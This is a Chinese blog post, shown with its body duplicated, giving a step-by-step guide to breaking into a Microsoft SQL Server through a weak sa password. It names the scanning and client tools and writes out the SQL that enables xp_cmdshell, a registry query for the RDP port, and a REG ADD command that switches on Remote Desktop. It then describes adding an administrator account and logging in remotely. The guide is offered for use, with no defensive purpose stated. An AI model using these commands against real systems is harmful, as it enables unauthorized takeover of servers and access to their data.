使用SQL弱口令入侵SQL服务器
2011-06-08 13:43
330 查看
使用SQL弱口令入侵SQL服务器
使用的工具:扫描工具X-scan
SQL查询分析器
SQLtools命令集成版
工具下载地址:http://down.51cto.com/data/211962
环境:Windows xp和Windows Server 2003企业版
1、在网络内扫描到一台SQL Server服务器,且sa密码为弱口令123
2、通过 SQLtools命令集成版这个软件,我们可以连上这台SQL Server服务器,如下图所示
3、虽然我们能succeed连接到SQL Server服务器,但是在我们执行dir c:\查看c盘文件时候,可能会报错,基于这种情况,我们可以使用SQL 查询分析器,修正该错误信息
4、打开SQL Server查询分析器,输入IP地址和sa帐号及密码
5、在查询分析器里输入SQL语句,并执行
SQL语句:
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
6、这时,我们在执行dir c:\命令查看c盘下的文件,查询成功
7、在SQLtools工具的dos命令窗口,执行netstat -an查看3389端口是否打开
8、同时使用SQL命令需要查询默认的3389端口是否已经被更改
SQl命令查询3389端口是否被更改:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
9、很显然,默认3389端口没有被修改,那么我们就可以执行dos命令,开启SQL Server服务器的3389端口
DOS命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
10、再次查询SQl Server的3389端口是否已经打开
(很明显我们已经成功开启对方的3389端口)
11、这时我们可以使用我们熟悉的dos命令对该SQL Server服务器新建用户,并加入到Administrators组
12、现在,我们就可以是用远程桌面连接这台SQL Server服务器了
备注:
一:现在的SQL Server服务器弱口令,个人感觉扫描到的几率微乎其微
二:如果对方没开启远程桌面,那么即使建立了自己的帐号,岂不也只能望而兴叹
三:如果对方开启了远程桌面,但是设置了IPsec策略,仅运行特定的IP段或IP地址访问,那么......
本文出自 “Darrenpan” 博客,请务必保留此出处http://darren.blog.51cto.com/1081720/583431
使用的工具:扫描工具X-scan
SQL查询分析器
SQLtools命令集成版
工具下载地址:http://down.51cto.com/data/211962
环境:Windows xp和Windows Server 2003企业版
1、在网络内扫描到一台SQL Server服务器,且sa密码为弱口令123
2、通过 SQLtools命令集成版这个软件,我们可以连上这台SQL Server服务器,如下图所示
3、虽然我们能succeed连接到SQL Server服务器,但是在我们执行dir c:\查看c盘文件时候,可能会报错,基于这种情况,我们可以使用SQL 查询分析器,修正该错误信息
4、打开SQL Server查询分析器,输入IP地址和sa帐号及密码
5、在查询分析器里输入SQL语句,并执行
SQL语句:
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'show advanced options', 0 --
6、这时,我们在执行dir c:\命令查看c盘下的文件,查询成功
7、在SQLtools工具的dos命令窗口,执行netstat -an查看3389端口是否打开
8、同时使用SQL命令需要查询默认的3389端口是否已经被更改
SQl命令查询3389端口是否被更改:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'
9、很显然,默认3389端口没有被修改,那么我们就可以执行dos命令,开启SQL Server服务器的3389端口
DOS命令:
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
10、再次查询SQl Server的3389端口是否已经打开
(很明显我们已经成功开启对方的3389端口)
11、这时我们可以使用我们熟悉的dos命令对该SQL Server服务器新建用户,并加入到Administrators组
12、现在,我们就可以是用远程桌面连接这台SQL Server服务器了
备注:
一:现在的SQL Server服务器弱口令,个人感觉扫描到的几率微乎其微
二:如果对方没开启远程桌面,那么即使建立了自己的帐号,岂不也只能望而兴叹
三:如果对方开启了远程桌面,但是设置了IPsec策略,仅运行特定的IP段或IP地址访问,那么......
本文出自 “Darrenpan” 博客,请务必保留此出处http://darren.blog.51cto.com/1081720/583431
相关文章推荐
- 使用SQL-DMO来操控SQL服务器
- 怎样使用 Tripwire 来检测 Ubuntu VPS 服务器的入侵
- 黑客SQL服务器入侵实战演习
- 免安装oracle客户端数据库,使用PL/SQL连接服务器oracle数据库
- [EntityFramework] 对 DateTime 类型使用 SQL 服务器时间或者字段默认值
- 您配置文件中的设置 (空密码的 root) 与 MySQL 默认管理员账户对应。您的 MySQL 服务器使用默认值运行当然没有问题,不过这样的话,被入侵的可能性会很大,我们强烈建议您应该立即给……
- SQL中两台服务器间使用连接服务器
- SQL 不同服务器之间的数据通信和游标使用
- 利用SQL分离器实现sa弱口令强行入侵
- 利用SQL分离器实现sa弱口令强行入侵
- 若要连接到此服务器,必须使用sql server management studio 或 sql server 管理对象(smo)
- SQLSERVER 在局域网使用Windows身份验证连接局域网内的另一台SQL服务器(不是域环境)
- Oracle PL/SQL管理LDAP服务器(DBMS_LDAP包的使用)
- 通过MSSQL SA弱口令入侵服务器
- 使用查询分析器调整SQL服务器脚本
- 关于sql时间函数的一些简单的例子(本机本地时间,国外服务器不能使用)
- oracle:使用cmd命令在远程oracle服务器上执行sql语句
- Oracle:如何使用PL-SQL 11.0连接远程Oracle12c服务器?
- sql弱口令入侵
- 在Windows Server 2008 R2 Server中,连接其他服务器的数据库遇到“未启用当前数据库的 SQL Server Service Broker,因此查询通知不受支持。如果希望使用通知,请为此数据库启用 Service Broker ”